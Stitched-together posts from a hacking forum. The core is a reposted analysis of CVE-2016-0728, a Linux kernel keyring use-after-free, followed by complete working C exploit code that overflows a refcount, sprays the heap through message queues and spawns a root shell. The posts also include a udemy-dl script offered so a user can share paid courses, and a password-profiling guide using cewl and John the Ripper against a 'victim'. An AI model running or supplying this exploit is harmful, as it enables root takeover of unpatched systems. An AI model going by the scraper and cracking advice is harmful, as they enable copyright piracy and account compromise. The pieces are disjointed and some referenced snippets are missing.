EvilZone

This

Lol nice one

I appreciate all your inputs )

Analysis and Exploitation of a Linux Kernel Vulnerability (CVE-2016-0728)
By Perception Point Research Team

 
Introduction

The Perception Point Research team has identified a 0-day local privilege escalation vulnerability in the Linux kernel. While the vulnerability has existed since 2012, our team discovered the vulnerability only recently, disclosed the details to the Kernel security team, and later developed a proof-of-concept exploit. As of the date of disclosure, this vulnerability has implications for approximately tens of millions of Linux PCs and servers, and 66 percent of all Android devices (phones/tablets). While neither us nor the Kernel security team have observed any exploit targeting this vulnerability in the wild, we recommend that security teams examine potentially affected devices and implement patches as soon as possible.

In this write-up, we’ll discuss the technical details of the vulnerability as well as the techniques used to achieve kernel code execution using the vulnerability. Ultimately, the PoC provided successfully escalates privileges from a local user to root.

The Bug

CVE-2016-0728 is caused by a reference leak in the keyrings facility. Before we dive into the details, let’s cover some background required to understand the bug.

Quoting directly from its manpage, the keyrings facility is primarily a way for drivers to retain or cache security data, authentication keys, encryption keys and other data in the kernel. System call interfaces – keyctl syscall (there are two other syscalls that are used for handling keys: add_key and request_key. keyctl, however, is definitely the most important one for this write-up.) are provided so that userspace programs can manage those objects and use the facility for their own purposes.

Each process can create a keyring for the current session using keyctl(KEYCTL_JOIN_SESSION_KEYRING, name)  and can choose to either assign a name to the keyring or not by passing NULL. The keyring object can be shared between processes by referencing the same keyring name. If a process already has a session keyring, this same system call will replace its keyring with a new one. If an object is shared between processes, the object’s internal refcount, stored in a field called usage, is incremented. The leak occurs when a process tries to replace its current session keyring with the very same one. As we see in the next code snippet, taken from kernel version 3.18, the execution jumps to error2 label which skips the call to key_put and leaks the reference that was increased by find_keyring_by_name.

Triggering the bug from userspace is fairly straightforward, as we can see in the following code snippet:

which results the following output having leaked-keyring 100 references:



 
Exploiting the Bug

Even though the bug itself can directly cause a memory leak, it has far more serious consequences. After a quick examination of the relevant code flow, we found that the usage field used to store the reference count for the object is of type atomic_t, which under the hood, is basically an int – meaning 32-bit on both 32-bit and 64-bit architectures. While every integer is theoretically possible to overflow, this particular observation makes practical exploitation of this bug as a way to overflow the reference count seem feasible. And it turns out no checks are performed to prevent overflowing the usage field from wrapping around to 0.

If a process causes the kernel to leak 0x100000000 references to the same object, it can later cause the kernel to think the object is no longer referenced and consequently free the object. If the same process holds another legitimate reference and uses it after the kernel freed the object, it will cause the kernel to reference deallocated, or a reallocated memory. This way, we can achieve a use-after-free, by using the exact same bug from before. A lot has been written on use-after-free vulnerability exploitation in the kernel, so the following steps wouldn’t surprise an experienced vulnerability researcher. The outline of the steps that to be executed by the exploit code is as follows:

    1. Hold a (legitimate) reference to a key object
    2. Overflow the same object’s usage
    3. Get the keyring object freed
    4. Allocate a different kernel object from user-space, with a user-controlled content, over the same memory previously       used by the freed keyring object
   5. Use the reference to the old key object and trigger code execution

Step 1 is completely out of the manpage, step 2 was explained earlier. Let’s dive into the technical details of the rest of the steps.

Overflowing usage Refcount

This step is actually an extension of the bug. The usage field is of int type which means it has a max value of 2^32 both on 32-bit and 64-bit architectures. To overflow the usage field we have to loop the snippet above 2^32 times to get usage to zero.

Freeing keyring object

There are a couple of ways to get the keyring object freed while holding a reference to it.  One possible way is using one process to overflow the keyring usage field to 0 and getting the object freed by the Garbage Collection algorithm inside the keyring subsystem which frees any keyring object the moment the usage counter is 0.

One caveat though, if we look at the join_session_keyring function prepare_creds also increments the current session keyring and abort_creds or commit_creds decrements it respectively. The problem is that abort_creds doesn’t decrement the keyring’s usage field synchronically but it is called later using rcu job, which means we can overflow the usage counter without knowing it was overflowed. It is possible to solve this issue by using sleep(1) after each call to join_session_keyring, of course it is not feasible to sleep(2^32) seconds. A feasible work around will be to use a variation of the divide-and-conquer algorithm and to sleep after 2^31-1 calls, then after 2^30-1 etc… this way we never overflow unintentionally because the maximum value of refcount can be double the value it should be if no jobs where called.
Allocating and controlling kernel object

Having our process point to a freed keyring object, now we need to allocate a kernel object that will override the freed keyring object. That will be easy thanks to how SLAB memory works, allocating many objects of the keyring size just after the object is freed. We choose to use the Linux IPC subsystem to send messages of size 0xb8 – 0x30  when 0xb8 is the size of the keyring object and 0x30 is the size of a message header.


This way we control the lower 0x88 bytes of the keyring object.

Gaining kernel code execution

From here it’s pretty easy thanks to the struct key_type inside the keyring object which contains many function pointers. An interesting function pointer is the revoke function pointer which can be invoked using the keyctl(KEY_REVOKE, key_name) syscall. The following is the Linux kernel snippet calling the revoke function:

The keyring object should be filled as follows:



The uid and flags attributes should be filled that way to pass a few control check until the execution gets to key->type->revoke. The type field should point to a user-space struct containing the function pointers with revoke pointing to a function that will be executed with root privileges. Here is a code snippet that demonstrates this.

Addresses of commit_creds and prepare_kernel_cred functions are static and can be determined per Linux kernel version/android device.

Now the last step is of course:

here is a link to the full exploit which runs on kernel 3.18 64-bit, following is the output of running the full exploit which takes about 30 minutes to run on Intel Core i7-5500 CPU (Usually time is not an issue in a privilege escalation exploit):
cve_2016_0728

Mitigations & Conclusions

The vulnerability affects any Linux Kernel version 3.8 and higher.  SMEP & SMAP will make it difficult to exploit as well as SELinux on android devices. Maybe we’ll talk about tricks to bypass those mitigation in upcoming blogs, anyway the most important thing  for now is to patch it as soon as you can.

Thanks to David Howells, Wade Mealing and the whole Red Hat Security team for that fast response and the cooperation fixing the bug.



/* $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall */
/* $ ./cve_2016_072 PP_KEY */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <keyutils.h>
#include <unistd.h>
#include <time.h>
#include <unistd.h>

#include <sys/ipc.h>
#include <sys/msg.h>

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

#define STRUCT_LEN (0xb8 - 0x30)
#define COMMIT_CREDS_ADDR (0xffffffff81094250)
#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff81094550)



struct key_type {
    char * name;
    size_t datalen;
    void * vet_description;
    void * preparse;
    void * free_preparse;
    void * instantiate;
    void * update;
    void * match_preparse;
    void * match_free;
    void * revoke;
    void * destroy;
};

void userspace_revoke(void * key) {
    commit_creds(prepare_kernel_cred(0));
}

int main(int argc, const char *argv[]) {
const char *keyring_name;
size_t i = 0;
    unsigned long int l = 0x100000000/2;
key_serial_t serial = -1;
pid_t pid = -1;
    struct key_type * my_key_type = NULL;
   
struct { long mtype;
char mtext[STRUCT_LEN];
} msg = {0x4141414141414141, {0}};
int msqid;

if (argc != 2) {
puts("usage: ./keys <key_name>");
return 1;
}

    printf("uid=%d, euid=%d\n", getuid(), geteuid());
    commit_creds = (_commit_creds) COMMIT_CREDS_ADDR;
    prepare_kernel_cred = (_prepare_kernel_cred) PREPARE_KERNEL_CREDS_ADDR;
   
    my_key_type = malloc(sizeof(*my_key_type));

    my_key_type->revoke = (void*)userspace_revoke;
    memset(msg.mtext, 'A', sizeof(msg.mtext));

    // key->uid
    *(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */
    //key->perm
    *(int*)(&msg.mtext[64]) = 0x3f3f3f3f;

    //key->type
    *(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type;

    if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
        perror("msgget");
        exit(1);
    }

    keyring_name = argv[1];

/* Set the new session keyring before we start */

serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name);
if (serial < 0) {
perror("keyctl");
return -1;
    }

if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) {
perror("keyctl");
return -1;
}


puts("Increfing...");
    for (i = 1; i < 0xfffffffd; i++) {
        if (i == (0xffffffff - l)) {
            l = l/2;
            sleep(5);
        }
        if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {
            perror("keyctl");
            return -1;
        }
    }
    sleep(5);
    /* here we are going to leak the last references to overflow */
    for (i=0; i<5; ++i) {
        if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {
            perror("keyctl");
            return -1;
        }
    }

    puts("finished increfing");
    puts("forking...");
    /* allocate msg struct in the kernel rewriting the freed keyring object */
    for (i=0; i<64; i++) {
        pid = fork();
        if (pid == -1) {
            perror("fork");
            return -1;
        }

        if (pid == 0) {
            sleep(2);
            if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
                perror("msgget");
                exit(1);
            }
            for (i = 0; i < 64; i++) {
                if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) {
                    perror("msgsnd");
                    exit(1);
                }
            }
            sleep(-1);
            exit(1);
        }
    }
   
    puts("finished forking");
    sleep(5);

    /* call userspace_revoke from kernel */
    puts("caling revoke...");
    if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) {
        perror("keyctl_revoke");
    }

    printf("uid=%d, euid=%d\n", getuid(), geteuid());
    execl("/bin/sh", "/bin/sh", NULL);

    return 0;
}



Necro!!! (Btw I don't know how people miss the giant block of red text when gravediggin... probably on tapatalk...)

Anyways, does anyone know of a udemy course extractor that I can just log in to and download the courses, would be pretty damn useful so I can share the few purchased courses I have, mainly all android and mobile app development. This is too much for me to do..

For windows:

udemy-dl -u username -p password https://www.udemy.com/course_name
#!/usr/bin/env python
# -*- coding: utf8 -*-

import requests
import requests.sessions
import argparse
import getpass
import sys
import re
import os
import json
import wget
import subprocess

# Version
__version__ = '2.0.1'

# User Agent String
useragent = 'Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0'

class DLException(Exception):
    """Raise if some lectured failed to download."""
    pass

def download(link, filename):
    """Download files to given destination file-name."""
    try:
        if 'pdf' in link:
            filename = filename.rstrip('mp4')+'pdf'
        elif 'mp3' in link:
            filename = filename.rstrip('mp4')+'mp3'

        if 'youtube.com' in link:
            youtube_dl(link, filename)
        else:
            try:
            aria2c_dl(link, filename)
            except OSError:
            if not os.path.exists(filename):
                try:
                curl_dl(link, filename)
                except OSError:
                if not os.path.exists(filename):
                wget.download(link, filename)
                else:
                raise DLException('Failed to download this lecture')
    except TypeError:
        print("Skipped. Url wasn't parsed properly.")


def curl_dl(link, filename):
    """Use curl as the downloader."""
    command = ['curl', '-C', '-', link, '-o', filename]

    cert_path = requests.certs.where()
    if cert_path:
        command.extend(['--cacert', cert_path])
    else:
        command.extend(['--insecure'])
    subprocess.call(command)


def dl_progress(num_blocks, block_size, total_size):
    """Show a decent download progress indication."""
    progress = num_blocks * block_size * 100 / total_size
    if num_blocks != 0:
        sys.stdout.write(4 * '\b')
    sys.stdout.write('{0:3d}%'.format((progress)))


def youtube_dl(link, filename):
    """Use youtube-dl as the downloader if videos are in youtube.com."""
    try:
        subprocess.call(['youtube-dl', '-o', filename, link])
    except OSError:
        raise DLException('Install youtube-dl to download this lecture')

def curl_dl(link, filename):
    """Use curl as the downloader."""
    command = ['curl', '-C', '-', link, '-o', filename]

    cert_path = requests.certs.where()
    if cert_path:
        command.extend(['--cacert', cert_path])
    else:
        command.extend(['--insecure'])
    subprocess.call(command)

def aria2c_dl(link, filename):
"""Use aria2c as the downloader."""
command = ['aria2c', '--continue', '--file-allocation=none', '-U', useragent, link, '-o', filename]
try:
subprocess.call(command)
except OSError:
curl_dl(link, filename)


class Session:
    """Starting session with proper headers to access udemy site"""
    headers = {'User-Agent': useragent,
               'X-Requested-With': 'XMLHttpRequest',
               'Host': 'www.udemy.com',
               'Referer': 'https://www.udemy.com/join/login-popup'}

    def __init__(self):
        self.session = requests.sessions.Session()
       
    def set_auth_headers(self, access_token, client_id):
        """ Setting up authentication headers. """
        self.headers['X-Udemy-Bearer-Token'] = access_token
        self.headers['X-Udemy-Client-Id'] = client_id
        self.headers['Authorization'] = "Bearer " + access_token
        self.headers['X-Udemy-Authorization'] = "Bearer " + access_token

    def get(self, url):
        """ Retreiving content of a given url. """
        return self.session.get(url, headers=self.headers)

    def post(self, url, data):
        """ HTTP post given data with requests object. """
        return self.session.post(url, data, headers=self.headers)


session = Session()


def get_csrf_token():
    """ Extractig CSRF Token from login page """
    response = session.get('https://www.udemy.com/join/login-popup')
    match = re.search("name=\'csrfmiddlewaretoken\' value=\'(.*)\'", response.text)
    return match.group(1)

def login(username, password):
    """ Login with popu-page. """
    login_url = 'https://www.udemy.com/join/login-popup/?displayType=ajax&display_type=popup&showSkipButton=1&returnUrlAfterLogin=https%3A%2F%2Fwww.udemy.com%2F&next=https%3A%2F%2Fwww.udemy.com%2F&locale=en_US'
    csrf_token = get_csrf_token()
    payload = {'isSubmitted': 1, 'email': username, 'password': password,
               'displayType': 'ajax', 'csrfmiddlewaretoken': csrf_token}
    response = session.post(login_url, payload)

    access_token = response.cookies.get('access_token')
    client_id = response.cookies.get('client_id')
    if access_token is None:
        print("Error: Couldn\'t fetch token !")
        sys.exit(1)
    session.set_auth_headers(access_token, client_id)

    response = response.text
    if 'error' in response:
        print(response)
        sys.exit(1)


def get_course_id(course_link):
    """ Retreiving course ID """
    response = session.get(course_link)
    matches = re.search('data-course-id="(\d+)"', response.text, re.IGNORECASE)
    return matches.groups()[0] if matches else None


def parse_video_url(course_id, lecture_id):
    """ Extracting video URLS. """
    get_url = 'https://www.udemy.com/api-2.0/users/me/subscribed-courses/{0}/lectures/{1}?video_only=&auto_play=&fields[lecture]=asset,embed_url&fields[asset]=asset_type,download_urls,title&instructorPreviewMode=False'.format(course_id, lecture_id)
    json_source = session.get(get_url).json()
   
    try:
        if json_source['asset']['download_urls']['Video']:
            list_videos = [item_ for item_ in json_source['asset']['download_urls']['Video']]
            list_videos = sorted(list_videos,key=lambda item_: int(item_['label']),reverse=True)
            for element in list_videos:
                if element['label'] == '1080':
                    return element['file']
                elif element['label'] == '720':
                    return element['file']
                elif element['label'] == '480':
                    return element['file']
                elif element['label'] == '360':
                    return element['file']
                else:
                    print('Skipped. Couldn\'t fetch video')
                    return None
    except KeyError:
        try:
            if json_source['asset']['download_urls']['E-Book']:
                for element in json_source['asset']['download_urls']['E-Book']:
                    if element['label'] == 'download':
                        return element['file']
                    else:
                        print('Skipped. Couldn\'t fetch e-book')
                        return None
        except KeyError:
            if json_source['asset']['download_urls']['Audio']:
                for element in json_source['asset']['download_urls']['Audio']:
                    if element['label'] == 'download':
                        return element['file']
                    else:
                        print('Skipped. Couldn\'t fetch audio')
                        return None
    else:
        print('Skipped. Something unexpected')
        return None


def get_video_links(course_id, lecture_start, lecture_end):
    """ Getting video links from api 1.1. """
    course_url = 'https://www.udemy.com/api-1.1/courses/{0}/curriculum?fields[lecture]=@min,completionRatio,progressStatus&fields[quiz]=@min,completionRatio'.format(course_id)
    course_data = session.get(course_url).json()

    chapter = None
    video_list = []

    lecture_number = 1
    chapter_number = 0
    # A udemy course has chapters, each having one or more lectures
    for item in course_data:
        if item['__class'] == 'chapter':
            chapter = item['title']
            chapter_number += 1

        elif item['__class'] == 'lecture' and (item['assetType'] == 'Video' or item['assetType'] == 'E-Book' or item['assetType'] == 'VideoMashup' or item['assetType'] == 'Audio'):
            lecture = item['title']
            if valid_lecture(lecture_number, lecture_start, lecture_end):
                try:
                    lecture_id = item['id']
                    video_url = parse_video_url(course_id, lecture_id)
                    video_list.append({'chapter': chapter,
                                       'lecture': lecture,
                                       'video_url': video_url,
                                       'lecture_number': lecture_number,
                                       'chapter_number': chapter_number})
                except Exception as e:
                    print('Cannot download lecture "{0!s}"'.format((lecture)))
            lecture_number += 1
    return video_list


def valid_lecture(lecture_number, lecture_start, lecture_end):
    """ Testing if the given lecture number is valid and exisit. """
    if lecture_start and lecture_end:
        return lecture_start <= lecture_number <= lecture_end
    elif lecture_start:
        return lecture_start <= lecture_number
    else:
        return lecture_number <= lecture_end


def sanitize_path(s):
    """ Cleaning up path for saving files. """
    return "".join([c for c in s if c.isalpha() or c.isdigit() or c in ' .-_,']).rstrip()


def mkdir(directory):
    """ Creating output directory structure, if not exisit. """
    if not os.path.exists(directory):
        os.makedirs(directory)


def get_video(directory, filename, link):
    """ Get video content. """
    print('Downloading {0!s}  '.format((filename.encode('utf-8'))))
    previous_dir = os.getcwd()
    mkdir(directory)
    os.chdir(directory)
    try:
        download(link, filename)
    except DLException as e:
        print('Couldn\'t download this lecture: {0}'.format(e))
    os.chdir(previous_dir)
    print('\n'),


def save_link(url):
    """save links to a file named links.txt"""
    url_str = str(url)
    with open('links.txt', 'a') as sv_file:
        sv_file.write(url_str + '\n')
        sv_file.close()


def udemy_dl(username, password, course_link, lecture_start, lecture_end, dest_dir="", save_links = None):
    """ Login into udemy and do all magic. """

    login(username, password)

    course_id = get_course_id(course_link)
    if not course_id:
        print('Failed to get course ID')
        return

    for video in get_video_links(course_id, lecture_start, lecture_end):
        if save_links:
            save_link(video['video_url'])
        else:
            directory = '{0:02d} {1!s}'.format(video['chapter_number'], video['chapter'].encode('utf-8'))
            directory = sanitize_path(directory)

            if dest_dir:
                directory = os.path.join(dest_dir, directory)

            filename = '{0:03d} {1!s}.mp4'.format(video['lecture_number'], video['lecture'].encode('utf-8'))
            filename = sanitize_path(filename)

            get_video(directory, filename, video['video_url'])
           
    if os.path.exists('links.txt'):
        print('links saved to file successfully.')

    session.get('http://www.udemy.com/user/logout')


def is_integer(p):
    """ Check if given value is an intiger. """
    try:
        int(p)
        return True
    except ValueError:
        return False

def main():
    """ Accepting arguments and preparing """
    parser = argparse.ArgumentParser(description='Fetch all the videos for a udemy course')
    parser.add_argument('link', help='Link for udemy course', action='store')
    parser.add_argument('-u', '--username', help='Username/Email', default=None, action='store')
    parser.add_argument('-p', '--password', help='Password', default=None, action='store')
    parser.add_argument('--lecture-start', help='Lecture to start at (default is 1)', default=1, action='store')
    parser.add_argument('--lecture-end', help='Lecture to end at (default is last)', default=None, action='store')
    parser.add_argument('-o', '--output-dir', help='Output directory', default=None, action='store')
    parser.add_argument('-s', '--save-links', help='Do not download but save links to a file', action='store_const', const=True, default=None)
    parser.add_argument('-v', '--version', help='Display the version of udemy-dl and exit', action='version', version='%(prog)s {version}'.format(version=__version__))

    args = vars(parser.parse_args())

    username = args['username']
    password = args['password']
    link_args = args['link']
    link = re.search( r'(https://www.udemy.com/.*?)/', link_args+'/').group(1)
    lecture_start = args['lecture_start']
    lecture_end = args['lecture_end']
    save_links = args['save_links']

    if lecture_start is not None:
        if not is_integer(lecture_start) or int(lecture_start) <= 0:
            print('--lecture_start requires natural number argument')
            sys.exit(1)
        lecture_start = int(lecture_start)
    if lecture_end is not None:
        if not is_integer(lecture_end) or int(lecture_end) <= 0:
            print('--lecture_end requires natural number argument')
            sys.exit(1)
        lecture_end = int(lecture_end)
   
    if args['output_dir']:
        # Normalize the output path if specified
        output_dir = os.path.normpath(args['output_dir'])
    else:
        # Get output dir name from the URL
        output_dir = os.path.join(".", link.rsplit('/', 1)[1])

    if not username:
        try:
            username = raw_input("Username/Email: ")  # Python 2
        except NameError:
            username = input("Username/Email: ")  # Python 3

    if not password:
        password = getpass.getpass(prompt='Password: ')

    print('Downloading to: {0!s}\n'.format((os.path.abspath(output_dir))))

    udemy_dl(username, password, link, lecture_start, lecture_end, output_dir, save_links)


if __name__ == '__main__':
    main()

Password Profiling

Using random word-lists to crack passwords can be a very long process due to large number of combinations. Password Profiling means, using words used by or about the victim in order to generate and include those in a customized word list.
To make this task shorter you can try to profile the password, because the creators of passwords are human beings, beings of habits. So I'll show you the basics of profiling passwords and you can research and customize deeper..


1. Scrape the web-server and output the generated word-list from words found in that web-server using cewl in kali linux

cewl www.example.com -w example-list.txt
To check for the length of your generated word-list:

cat example-list.txt |wc -l
2. Customize your generated wordlist by adding rules in john the ripper

nano /etc/john/john.conf
and then proceed to add rules to those passwords in order to customize a better word-list

example:

$[0-9]$[0-9]  #In each word, this rule will add 2 numbers at the end of the word

Finally, just output the word-list one more time and you got yourself a list of possible passwords used by the victim.

As the moderator of the eBooks board, I approve of this message. If someone complains and can't help himself, he is in the wrong place. Now it would be ironic if someone moved this to the eBook board

That would be ironic and hilarious at the same time hahaha

problem is they wont bother to read this before they complain.

You are absolutely right my friend.

I suggest the Nexus 6 or 5. So you can root it and install nethunter, which is basically kali linux on your phone.

Then again you could do that on a raspberry pi.

Why not pay with bitcoins? There's a ton of companies who accept it, and don't require id.